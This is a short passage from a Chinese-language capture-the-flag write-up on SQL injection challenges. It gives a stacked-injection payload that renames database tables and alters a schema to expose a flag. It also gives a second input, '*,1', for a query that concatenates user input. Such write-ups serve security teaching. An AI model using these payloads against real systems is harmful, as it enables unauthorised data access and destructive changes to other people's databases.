可以推测当前表是words表,并且根据id字段来查询。 我们可以把words表改成别的名字,第二个表的名字改成words,因为第二个表没有id字段,所以添加一个id字段。 语句为 1’;rename table words to word123;rename table `1919810931114514` to words;alter table words add(id int(10))# 然后爆出全部数据
获得flag
第五题 堆叠注入
貌似当前数据库只有Flag表 源码的SQL语句是这样的 select $_GET[‘query’] || flag from flag 然后输入 *,1 获取flag